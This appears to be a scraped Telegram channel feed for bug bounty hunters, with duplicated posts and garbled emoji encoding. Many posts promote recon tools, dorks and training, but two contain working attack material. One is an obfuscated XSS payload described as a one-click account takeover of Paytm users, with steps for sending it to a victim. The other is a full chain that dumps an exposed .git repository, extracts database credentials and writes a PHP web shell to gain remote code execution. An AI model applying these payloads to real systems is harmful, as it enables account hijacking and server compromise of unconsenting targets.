β³ s3dns - a lightweight DNS server that helps uncover cloud storage buckets (AWS S3, Google Cloud Storage, and Azure Blob) by resolving DNS requests, tracing CNAMEs, and matching known bucket URL patterns.
What it does?
β’ Resolves CNAME records to uncover hidden S3 locations
β’ Detects AWS S3 bucket URL patterns
β’ Helps find potentially exposed S3 buckets
β’ Easy to deploy via Docker
Installation
Repository: Github
What it does?
β’ Resolves CNAME records to uncover hidden S3 locations
β’ Detects AWS S3 bucket URL patterns
β’ Helps find potentially exposed S3 buckets
β’ Easy to deploy via Docker
Installation
git clone https://github.com/olizimmermann/s3dns.git
cd s3dns
pip install -r requirements.txt
Repository: Github
β€10π4πΏ3
π± Android Native Scanner β automatically detects RCE, tokens, API keys, URLs & base64 payloads inside .so files!
π Features:
𧨠system, exec, popen β RCE scoring
π API key / token / JWT detection
π Extracts hardcoded URLs & endpoints
𧬠JNI & native method scanner
π Auto-generated TXT reports
π Project β
https://github.com/ynsmroztas/AndroidNativeScanner
π£ No more manual hunting in .so files.
β‘ One script, full visibility.
π Features:
𧨠system, exec, popen β RCE scoring
π API key / token / JWT detection
π Extracts hardcoded URLs & endpoints
𧬠JNI & native method scanner
π Auto-generated TXT reports
π Project β
https://github.com/ynsmroztas/AndroidNativeScanner
π£ No more manual hunting in .so files.
β‘ One script, full visibility.
β€17π5π₯4π’1
Hey Hunter's,
DarkShadow here, back again just dropping a POC.
π€«Unauthenticated WordPress Auth bypass π₯
ο»Ώ
#bugbountytips #authbypass
DarkShadow here, back again just dropping a POC.
π€«Unauthenticated WordPress Auth bypass π₯
After sending the 1st request use the provided last Cookie and send request on /wp-admin and BOOM auth bypassed π₯
ο»Ώ
#bugbountytips #authbypass
π₯20β€7πΏ5π2
Hey Hunter's,
DarkShadow here back again, just dropping a dorkπ€«
β¨google dork searching public exploits from githubπ
#dork #bugbountytips
DarkShadow here back again, just dropping a dorkπ€«
β¨google dork searching public exploits from githubπ
"CVE-YYYY-NNNN" exploit site:github.com
"CVE-YYYY-NNNN" exploit POC site:github.com
"CVE-YYYY-NNNN" proof of concept site:github.com
#dork #bugbountytips
β€10π7π₯4
π¨ Brut Security - New Batch Starts 18th August!
Join our Ethical Hacking Network Pentesting & Web Pentesting / Bug Bounty training β practical sessions, real-world attacks, and community support from Day 1.
β DM +918945971332 to enroll. Limited slots.
βhttps://wa.me/918945971332
Join our Ethical Hacking Network Pentesting & Web Pentesting / Bug Bounty training β practical sessions, real-world attacks, and community support from Day 1.
β DM +918945971332 to enroll. Limited slots.
βhttps://wa.me/918945971332
WhatsApp.com
Brut Security
Business Account
β€7
Hey Hunter's,
DarkShadow hare back again.
πΏππ§π ππ£ππππ£πππ§ my own private tool which i used to extract endpoints from browse through passive recon.
β¨ Features:
β Extract subdomains.
β Extract categories endpoints from subdomains.
β Extract external domains.
If you find this tool useful, give it a βοΈ and share it with others in the hacking & BugBounty community!
https://github.com/darkshadow2bd/DarkEndFinder
DarkShadow hare back again.
πΏππ§π ππ£ππππ£πππ§ my own private tool which i used to extract endpoints from browse through passive recon.
β¨ Features:
β Extract subdomains.
β Extract categories endpoints from subdomains.
β Extract external domains.
If you find this tool useful, give it a βοΈ and share it with others in the hacking & BugBounty community!
https://github.com/darkshadow2bd/DarkEndFinder
GitHub
GitHub - darkshadow2bd/DarkEndFinder: BookMark and Find Subdomains, Endpoints, External Domains in your web browser.
BookMark and Find Subdomains, Endpoints, External Domains in your web browser. - GitHub - darkshadow2bd/DarkEndFinder: BookMark and Find Subdomains, Endpoints, External Domains in your web browser.
β€16π3π¨βπ»3π2
CVE-2025-7443: Unrestricted Upload of File with Dangerous Type in BerqWP Plugin, 8.1 ratingβοΈ
Lack of file validation allows attackers to upload arbitrary files, which can lead to RCE.
Search at Netlas.io:
π Link: https://nt.ls/puxoz
π Dork: http.body:"plugins/searchpro"
Read more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/searchpro/berqwp-2242-unauthenticated-arbitrary-file-upload
Lack of file validation allows attackers to upload arbitrary files, which can lead to RCE.
Search at Netlas.io:
π Link: https://nt.ls/puxoz
π Dork: http.body:"plugins/searchpro"
Read more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/searchpro/berqwp-2242-unauthenticated-arbitrary-file-upload
π¨βπ»6β€3π«‘2
π¨βπ³ Damn-Vulnerable-RESTaurant π¨βπ³
β‘οΈAn intentionally vulnerable Web API game for learning and training purposes dedicated to developers, ethical hackers and security engineers.
β Get: https://github.com/theowni/Damn-Vulnerable-RESTaurant-API-Game
β‘οΈAn intentionally vulnerable Web API game for learning and training purposes dedicated to developers, ethical hackers and security engineers.
β Get: https://github.com/theowni/Damn-Vulnerable-RESTaurant-API-Game
π₯14β€12
Media is too big
VIEW IN TELEGRAM
Hey Hunter's,
DarkShadow here back again!
SubClick One-click Subdomain Finder Bookmark template.
π§ Features
β One-click execution β just add to bookmarks and click
β No setup required β works as a browser bookmarklet
β Fast subdomain discovery from multiple public sources
β Subdomain live check (best-effort, despite CORS/CSP)
β Download results as .txt directly from the browser
β Displays subdomains as clickable links with basic status
β Fully client-side β no server or data collection involved
β Bug bounty friendly β made for recon & live target scanning
#bugbountytips #infosec
DarkShadow here back again!
SubClick One-click Subdomain Finder Bookmark template.
This is my private tool that I use during bug hunting.
If you guys like it, Iβll publish it on my GitHub.
Iβve uploaded a sample video demo β let me know what you think!
π§ Features
β One-click execution β just add to bookmarks and click
β No setup required β works as a browser bookmarklet
β Fast subdomain discovery from multiple public sources
β Subdomain live check (best-effort, despite CORS/CSP)
β Download results as .txt directly from the browser
β Displays subdomains as clickable links with basic status
β Fully client-side β no server or data collection involved
β Bug bounty friendly β made for recon & live target scanning
#bugbountytips #infosec
π€13β€7π«‘4π₯2
Brut Security
Hey Hunter's, DarkShadow here back again! SubClick One-click Subdomain Finder Bookmark template. This is my private tool that I use during bug hunting. If you guys like it, Iβll publish it on my GitHub. Iβve uploaded a sample video demo β let me know whatβ¦
Hey Hunter's,
DarkShadow here back again dropping my own private tool now!
SubClick is now available in my GitHub repo.
Collect subdomains in just one click! Bookmark β visit target β click β done β
https://github.com/darkshadow2bd/SubClick
β¨If it is helpful give a β in GitHub
#bugbountytips #infosec
DarkShadow here back again dropping my own private tool now!
SubClick is now available in my GitHub repo.
Collect subdomains in just one click! Bookmark β visit target β click β done β
https://github.com/darkshadow2bd/SubClick
#bugbountytips #infosec
π₯12β€10π1
Hey Hunter's,
DarkShadow here back again, dropping a recent XSS patch in Paytm!
πStep to reproduce:
1. Enter the payload in search box
2. Grape the URL.
3. Send it to the victim.
4. One click account takeover!
β Payload:
Cradit ~@TEAM_DH049
#bugbountytips #xss
DarkShadow here back again, dropping a recent XSS patch in Paytm!
πStep to reproduce:
1. Enter the payload in search box
2. Grape the URL.
3. Send it to the victim.
4. One click account takeover!
β Payload:
<svg onload=(new Function('\u0073\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0039\u0037\u002c\u0031\u0030\u0038\u002c\u0031\u0030\u0031\u002c\u0031\u0030\u0039\u002c\u0031\u0031\u0036\u002c\u0034\u0030\u002c\u0034\u0039\u002c\u0034\u0039\u002c\u0034\u0039\u002c\u0034\u0031\u0029'))()>
Cradit ~
#bugbountytips #xss
1β€21π4π3π₯2
Hey Hunter's,
DarkShadow here back again....
Just wanted to announce all of you that:
Let me know what's your Instagram account id, i wanna see your chat's in Instagram π
Don't forget to follow me ππΌ x.com/darkshadow2bd
DarkShadow here back again....
Just wanted to announce all of you that:
β¨Instagram.com is my now π
Let me know what's your Instagram account id, i wanna see your chat's in Instagram π
Don't forget to follow me ππΌ x.com/darkshadow2bd
π±10π6β€4π«‘2π1
Hey Hunter's,
DarkShadow here back again, dropping one of my secret methodologies that turns a full Remote Code Execution!
π₯ From /.git to FULL RCE β The Ultimate Git-Based Exploitation Chainπ₯
π― Target: Exposed .git/ Directory
You found a target where /.git/ is publicly accessible?
Think it's just a low-hanging fruit misconfiguration?
Think again β weβre about to break that into Critical RCE π₯
π Tip: Use Chrome extensions like DotGit, GitHound, or your any favorite fuzzing tools.
βοΈ Step-by-Step Exploitation
Step 1: Dump the Git Repo
Use GitDumper from GitTools:
Step 2: Reconstruct the Source Code
β This restores all files from the latest commit, giving you full access to the source code.
Step 3: Explore Git History for Secrets
Look for hardcoded credentials, tokens, DB configs, etc.
π Realistic Example:
Weβve got database password!
Step 4: Connect to the Database
Step 5: Escalate to RCE via SQL
Check your privileges:
β If You Have FILE Privilege:
Write a web shell to the web root:
Then browse:
Boom π₯ β Remote Code Execution on the box!
If you enjoyed this methodology and want more exploitation chains, PoCs, and red team tips, make sure to follow me on X ππΌ x.com/darkshadow2bd
#bugbountytips
DarkShadow here back again, dropping one of my secret methodologies that turns a full Remote Code Execution!
π₯ From /.git to FULL RCE β The Ultimate Git-Based Exploitation Chainπ₯
π― Target: Exposed .git/ Directory
You found a target where /.git/ is publicly accessible?
Think it's just a low-hanging fruit misconfiguration?
Think again β weβre about to break that into Critical RCE π₯
π Tip: Use Chrome extensions like DotGit, GitHound, or your any favorite fuzzing tools.
βοΈ Step-by-Step Exploitation
Step 1: Dump the Git Repo
Use GitDumper from GitTools:
git clone https://github.com/internetwache/GitToolsπ This tool will recursively download the entire .git repository into /webCode
cd GitTools/Dumper
bash gitdumper.sh https://target.com/.git/ webCode
Step 2: Reconstruct the Source Code
cd webCode
git checkout .
β This restores all files from the latest commit, giving you full access to the source code.
Step 3: Explore Git History for Secrets
git log -p
Look for hardcoded credentials, tokens, DB configs, etc.
π Realistic Example:
commit 3b95f2c798a12427a1234b6d1234567890abcdef
Author: dev_admin <[email protected]>
Date: Thu Jul 11 17:32:15 2024 +0000
Added database config
diff --git a/config.php b/config.php
new file mode 100644
+++ b/config.php
@@ -0,0 +1,6 @@
+<?php
+$db_host = "258.20.78.55";
+$db_user = "root";
+$db_pass = "master_!pass2020";
+$db_name = "production";
+?>
Weβve got database password!
Step 4: Connect to the Database
mysql -h 258.20.78.55 -u root -p'master_!pass2020'
Step 5: Escalate to RCE via SQL
Check your privileges:
SHOW GRANTS FOR CURRENT_USER;
β If You Have FILE Privilege:
Write a web shell to the web root:
SELECT "<?php system($_GET['cmd']); ?>"
INTO OUTFILE '/var/www/html/shell.php';
Then browse:
https://target.com/shell.php?cmd=id
Boom π₯ β Remote Code Execution on the box!
If you enjoyed this methodology and want more exploitation chains, PoCs, and red team tips, make sure to follow me on X ππΌ x.com/darkshadow2bd
#bugbountytips
π₯20β€11π«‘5π1